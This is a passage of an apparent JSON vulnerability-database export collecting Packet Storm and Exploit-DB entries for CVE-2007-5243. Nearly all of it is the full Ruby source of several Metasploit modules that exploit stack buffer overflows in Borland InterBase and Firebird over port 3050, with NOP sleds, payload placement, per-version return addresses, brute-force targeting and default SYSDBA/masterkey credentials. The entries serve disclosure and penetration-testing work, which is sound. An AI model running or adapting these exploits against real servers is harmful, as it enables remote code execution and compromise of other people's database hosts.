\n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase PWD_db_aliased() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted attach request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38607' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n}, \n'Targets' => \n[ \n# 0x0804cbe4 pop esi; pop ebp; ret \n[ \n'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', \n{ 'Ret' => 0x0804cbe4 } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit \n \nconnect \n \n# Attach database \nop_attach = 19 \n \nlength = 1152 \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# It will return into this nop block \nbuf << make_nops(length - payload.encoded.length - 4) \n \n# Payload \nbuf << payload.encoded \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nhandler \n \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82246/ib_pwd_db_aliased.rb.txt"}, {"lastseen": "2016-12-05T22:15:16", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Borland InterBase SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83227", "href": "https://packetstormsecurity.com/files/83227/Borland-InterBase-SVC_attach-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase SVC_attach() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted service attach request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38605' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x00403d4b pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.1.0.257', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b } \n], \n# 0x00403d4d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.0.0.123', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d } \n], \n# 0x00403a5d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d } \n], \n# 0x004038fd pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.0.1.1', \n{ 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd } \n], \n# 0x0040390d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.5.0.28', \n{ 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d } \n], \n# 0x00403901 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.1.6', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 } \n], \n# 0x004038b1 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 } \n], \n# 0x00404a10 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.5.0.742', \n{ 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 } \n], \n# 0x00404a0e pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.1.1.680', \n{ 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \n# Create database \nop_create = 20 \n \n# Service attach \nop_service_attach = 82 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_service_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-1028].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83227/ib_svc_attach.rb.txt"}, {"lastseen": "2016-12-05T22:22:57", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Firebird Relational Database isc_attach_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83201", "href": "https://packetstormsecurity.com/files/83201/Firebird-Relational-Database-isc_attach_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38607' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls' \n[ \n'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)', \n{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 1 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \n \n \n# Create database parameter block \ndef dpb_create \nisc_dpb_user_name = 28 \nisc_dpb_password = 29 \n \nisc_dpb_version1 = 1 \n \nuser = 'SYSDBA' \npass = 'masterkey' \n \ndpb = '' \n \ndpb << [isc_dpb_version1].pack('c') \n \ndpb << [isc_dpb_user_name].pack('c') \ndpb << [user.length].pack('c') \ndpb << user \n \ndpb << [isc_dpb_password].pack('c') \ndpb << [pass.length].pack('c') \ndpb << pass \n \ndpb \nend \n \n# Calculate buffer padding \ndef buf_padding(length = '') \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \npadding \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \n# Extra padding to trigger the exception \nextra_padding = 1024 * 16 \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length + extra_padding].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-516].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Random alpha data \nbuf << rand_text_alpha(extra_padding) \n \n# Padding \nbuf << \"\\x00\" * buf_padding(length + extra_padding) \n \n# Database parameter block \n \n# Create database parameter block \ndpb = dpb_create \n \n# Database parameter block length \nbuf << [dpb.length].pack('N') \n \n# Database parameter block \nbuf << dpb \n \n# Padding \nbuf << \"\\x00\" * buf_padding(dpb.length) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83201/fb_isc_attach_database.rb.txt"}, {"lastseen": "2016-12-05T22:15:14", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Firebird Relational Database isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83238", "href": "https://packetstormsecurity.com/files/83238/Firebird-Relational-Database-isc_create_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38606' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls' \n[ \n'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)', \n{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 1 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \n \n \n# Create database parameter block \ndef dpb_create \nisc_dpb_user_name = 28 \nisc_dpb_password = 29 \n \nisc_dpb_version1 = 1 \n \nuser = 'SYSDBA' \npass = 'masterkey' \n \ndpb = '' \n \ndpb << [isc_dpb_version1].pack('c') \n \ndpb << [isc_dpb_user_name].pack('c') \ndpb << [user.length].pack('c') \ndpb << user \n \ndpb << [isc_dpb_password].pack('c') \ndpb << [pass.length].pack('c') \ndpb << pass \n \ndpb \nend \n \n# Calculate buffer padding \ndef buf_padding(length = '') \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \npadding \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Create database \nop_create = 20 \n \n# Extra padding to trigger the exception \nextra_padding = 1024 * 16 \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_create].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length + extra_padding].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-516].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Random alpha data \nbuf << rand_text_alpha(extra_padding) \n \n# Padding \nbuf << \"\\x00\" * buf_padding(length + extra_padding) \n \n# Database parameter block \n \n# Create database parameter block \ndpb = dpb_create \n \n# Database parameter block length \nbuf << [dpb.length].pack('N') \n \n# Database parameter block \nbuf << dpb \n \n# Padding \nbuf << \"\\x00\" * buf_padding(dpb.length) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83238/fb_isc_create_database.rb.txt"}, {"lastseen": "2016-12-05T22:11:38", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Borland InterBase isc_attach_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83151", "href": "https://packetstormsecurity.com/files/83151/Borland-InterBase-isc_attach_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase isc_attach_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted attach request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38607' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x00403d4b pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.1.0.257', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b } \n], \n# 0x00403d4d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.0.0.123', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d } \n], \n# 0x00403a5d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d } \n], \n# 0x004038fd pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.0.1.1', \n{ 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd } \n], \n# 0x0040390d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.5.0.28', \n{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d } \n], \n# 0x00403901 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.1.6', \n{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 } \n], \n# 0x004038b1 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', \n{ 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 } \n], \n# 0x00404a10 pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.5.0.742', \n{ 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 } \n], \n# 0x00404a0e pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V5.1.1.680', \n{ 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e } \n], \n# Debug \n[ \n'Debug', \n{ 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit_target(target) \n \ntarget['Length'].each do |length| \n \nconnect \n \n# Attach database \nop_attach = 19 \n \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_attach].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# Nop block \nbuf << make_nops(length - payload.encoded.length - 13) \n \n# Payload \nbuf << payload.encoded \n \n# Jump back into the nop block \nbuf << \"\\xe9\" + [-1028].pack('V') \n \n# Jump back \nbuf << \"\\xeb\" + [-7].pack('c') \n \n# Random alpha data \nbuf << rand_text_alpha(2) \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024) \n \nsock.put(buf) \n \nsleep(4) \n \nhandler \n \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83151/ib_isc_attach_database.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T23:49:47", "description": "Firebird Relational Database SVC_attach() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Firebird Relational Database SVC_attach Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16420", "href": "https://www.exploit-db.com/exploits/16420/", "sourceData": "##\r\n# $Id: fb_svc_attach.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Firebird Relational Database SVC_attach() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted service attach request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38605' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 256,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# 0x0040230b pop ebp; pop ebx; ret\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910',\r\n\t\t\t\t\t\t{ 'Length' => [ 308 ], 'Ret' => 0x0040230b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 308 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 1,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit_target(target)\r\n\r\n\t\ttarget['Length'].each do |length|\r\n\r\n\t\t\tconnect\r\n\r\n\t\t\t# Attach database\r\n\t\t\top_attach = 19\r\n\r\n\t\t\t# Create database\r\n\t\t\top_create = 20\r\n\r\n\t\t\t# Service attach\r\n\t\t\top_service_attach = 82\r\n\r\n\t\t\tremainder = length.remainder(4)\r\n\t\t\tpadding = 0\r\n\r\n\t\t\tif remainder > 0\r\n\t\t\t\tpadding = (4 - remainder)\r\n\t\t\tend\r\n\r\n\t\t\tbuf = ''\r\n\r\n\t\t\t# Operation/packet type\r\n\t\t\tbuf << [op_service_attach].pack('N')\r\n\r\n\t\t\t# Id\r\n\t\t\tbuf << [0].pack('N')\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [length].pack('N')\r\n\r\n\t\t\t# Nop block\r\n\t\t\tbuf << make_nops(length - payload.encoded.length - 13)\r\n\r\n\t\t\t# Payload\r\n\t\t\tbuf << payload.encoded\r\n\r\n\t\t\t# Jump back into the nop block\r\n\t\t\tbuf << \"\\xe9\" + [-260].pack('V')\r\n\r\n\t\t\t# Jump back\r\n\t\t\tbuf << \"\\xeb\" + [-7].pack('c')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(2)\r\n\r\n\t\t\t# Target\r\n\t\t\tbuf << [target.ret].pack('V')\r\n\r\n\t\t\t# Padding\r\n\t\t\tbuf << \"\\x00\" * padding\r\n\r\n\t\t\t# Database parameter block\r\n\r\n\t\t\t# Length\r\n\t\t\tbuf << [1024].pack('N')\r\n\r\n\t\t\t# Random alpha data\r\n\t\t\tbuf << rand_text_alpha(1024)\r\n\r\n\t\t\tsock.put(buf)\r\n\r\n\t\t\t#select(nil,nil,nil,4)\r\n\r\n\t\t\thandler\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16420/"}, {"lastseen": "2016-02-01T23:51:15", "description": "Firebird Relational Database isc_create_database() Buffer Overflow. CVE-2007-5243. Remote exploit for windows platform", "published": "2010-07-03T00:00:00", "type": "exploitdb", "title": "Firebird Relational Database isc_create_database Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2010-07-03T00:00:00", "id": "EDB-ID:16432", "href": "https://www.exploit-db.com/exploits/16432/", "sourceData": "##\r\n# $Id: fb_isc_create_database.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::BruteTargets\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'Firebird Relational Database isc_create_database() Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\r\n\t\t\t\tby sending a specially crafted create request.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision: 9669 $',\r\n\t\t\t'Author'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t'ramon',\r\n\t\t\t\t\t'Adriano Lima <adriano@risesecurity.org>',\r\n\t\t\t\t],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'win',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-5243' ],\r\n\t\t\t\t\t[ 'OSVDB', '38606' ],\r\n\t\t\t\t\t[ 'BID', '25917' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Brute Force', { } ],\r\n\t\t\t\t\t# '\\Device\\HarddiskVolume1\\WINDOWS\\system32\\unicode.nls'\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0x00370b0b }\r\n\t\t\t\t\t],\r\n\t\t\t\t\t# Debug\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Debug',\r\n\t\t\t\t\t\t{ 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 1,\r\n\t\t\t'DisclosureDate' => 'Oct 03 2007'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(3050)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# Create database parameter block\r\n\tdef dpb_create\r\n\t\tisc_dpb_user_name = 28\r\n\t\tisc_dpb_password = 29\r\n\r\n\t\tisc_dpb_version1 = 1\r\n\r\n\t\tuser = 'SYSDBA'\r\n\t\tpass = 'masterkey'\r\n\r\n\t\tdpb = 